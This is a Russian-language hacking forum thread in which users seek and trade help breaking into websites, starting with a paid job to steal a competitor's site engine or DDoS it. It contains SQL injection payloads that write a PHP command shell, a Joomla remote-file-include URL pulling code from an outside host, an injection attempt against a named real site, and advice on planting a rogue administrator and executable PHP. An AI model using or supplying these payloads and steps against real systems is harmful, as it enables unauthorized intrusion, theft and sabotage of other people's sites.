Мужики, в общем дело такое: пришёл заказ. Сабж не указываю по понятным причинам. Задача-достать движок, который разумеется конкурент конкуренту не продаст. Коммерсанты херовы, млин. Если не получится достать движ-то ДДоС. Ну ладно, полез просто посмотреть, хоть и не совсем мой профиль, но расти-то надо всегда. С БТ дружу понемногу, но начал с SSS на винде. Он мне дал следующее: 1 CGI Scripts : Zen Cart Multiple File Include Vulnerabilities Порт 80 Описание Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable. Как исправить Upgrading to the most recent version of Zen Cart. Уровень риска Высокий Ссылки Zen Cart Homepage Скрипт http://subj.ru/index.php? CVE CVE-MAP-NOMATCH Bugtraq ID 19543 ............. 2 Mail Servers : SMTP without AuthLogin Порт 2500 Описание An SMTP service supports SMTP without AuthLogin. Как исправить Install authlogin. Уровень риска Низкий ............. 3 Web Servers : The list of E-Mail Порт 80 Описание Found E-Mail on web site Уровень риска Информационный E-Mail //[email protected]/ CVE GENERIC-MAP-NOMATCH ............ Всё в степени от высокого до низкого. Ну, думаю, делать нечего-полез в сеть по "красному коду", хоть и понимаю, что "боян". Ачат курил и курю, вот тут по вопросу о Zen Cart нашел у г-на DIAgen'а следующее: 1 HTML: admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0 , на что сабж ответил: HTML: Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'<?php+s ystem($_GET[cmd]);+?>',0 was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. . После апробации второго варианта воздействия а-ля PHP: +INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend мне сабжем было сказано: PHP: Not Found The requested URL /+INTO+OUTFILE+'shell.php'+FROM+force_table_err or/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. . Я подумал, что мб ошибся и дал ему всё одной строкой, на что получил PHP: Not Found The requested URL /admin/password_forgotten.php POST admin_email='UNION+SELECT+0,0,'<?php+s ystem($_GET[cmd]);+?>',0 +INTO+OUTFILE+'shell.php'+FROM+force_table_err or/*&submit=resend was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. . В общем, я "интуитивно догадываюсь" (с), что нужно по уму лезть в линь, и собирать "пальцы" оси и тд, но согласитесь это не имеет смысла, учитывая что не умеешь эксплуатировать уязвимость. Я в состоянии запустить nmap или любой другой сканер, и собрать эту информацию, но без адвайза это делу не поможет, согласитесь. Я всё же больше по выпечке, хоть и хочется расти над собой. Так как я не любитель получать всё "искаропки" и не школоло, которому вечно нужна кнопка взлома интернета прошу указания\совета\какие данные мне нужно собрать о сабже, чтобы двигаться дальше, либо какими утилитами эксплуатировать сабж. Имею свой домен, возможность поставить шелл есть. Подписался не столько за деньги, сколько за опыт, чего и вам желаю. Набившего оскомину "заранее спасибо" писать не буду, но буду благодарен за любое указание верного направления, т.к. помощь требуется в основном в том, какова последовательность шагов и утилит, назовем это так.
Подскажите, как подключиться к базе данных сайта, зная ее имя, логин и пароль пользователя? Шелла на сайте нет, соответственно по localhost - не получается. Судя по хостингу - используется DirectAdmin. Не пойму, какой порт писать для подключения к Mysql.
Exploit у меня вопрос что дальше делать?(хочу использовать експлоит) Microsoft Windows [Version 6.1.7601] (c) Корпорац?я Майкрософт (Microsoft Corporation), 2009. Ус? права захищено. C:\Users\User>php -v PHP 5.2.17 (cli) (built: Jan 6 2011 17:28:41) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies C:\Users\User>php C:\Users\User\Desktop\11263.php ################################################## ####################### # LFI discovery and implementation: Nikola Petrov ([email protected]) # Date: 27.08.2009 ################################################## ####################### usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug] example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../ ../../wamp/www/j1512/images/stories/duck.jpg 80 1 C:\Users\User> Хочу использовать например вот етот експлоит -http://www.exploit-db.com/exploits/11263/-для сайта www.сайт.it.( что для этого надо?)експлоит на пхп интерпретатор пхп скачал запустил через сmd что дальше делать? где и что вписывать или я что то не так делаю? и еще сайт на joomla 1.5 может кто подскажет как получить доступ к админке те логин и пароль?( извините за глупый вопрос я новичок)
на любом нормальном хостинге доступ к базе данных разрешен только с localhost, а возможность удаленного доступа настраивается отдельно, причем чаще всего разрешение дается на определенную подсеть или ip. порт mysql по умолчанию - 3306. попробуйте написать какой-нибудь простой скрипт на пхп по любому учебнику. который, например, подключался бы к mysql, и умел читать и записывать туда данные. тогда вопросы что делать со скриптом-эксплоитом отпадут. это самый быстрый способ. ну и вот тут вам показали как использовать скрипт (строка usage) и дали пример (строка example) Code: C:\Users\User>php C:\Users\User\Desktop\11263.php usage: php C:\Users\User\Desktop\11263.php host path file [port] [debug] example: php C:\Users\User\Desktop\11263.php localhost /j1512 ../../../../../../ ../../wamp/www/j1512/images/stories/duck.jpg 80
ребят, подскажите,есть ли какие уязвимости в Netcat (CMS) желательно для последних версий, но и старые тоже подойдут
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit: http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt Хотя уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии. Попробуй в компонентах баги поищи
http://tosnoshield.ru http://tosnoshield.ru//index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2 Можете помочь скуль доделать?
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД.. пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код... с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей: Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно.
Drupal Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны. Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ? Пожалуйста, по существу...
Нашел слепую скулю в cms Nautilus, делать полный дамп - долго, муторно и не нужно. Подскажите, в какой таблице лежат логины и пассы... поиск ничего не дал
Доброго всем дня, движок стоит interspire shopping cart, каким образом можно определить версию, которая установленна в данный момент?
Создай себе админа в бд, зайди в админку, и установи модуль mod_php, он всё выводить должен. Если будет резать код при сохранении, просто зайди в настройку пользователей, выбери своего пользователя, и отключи редактор.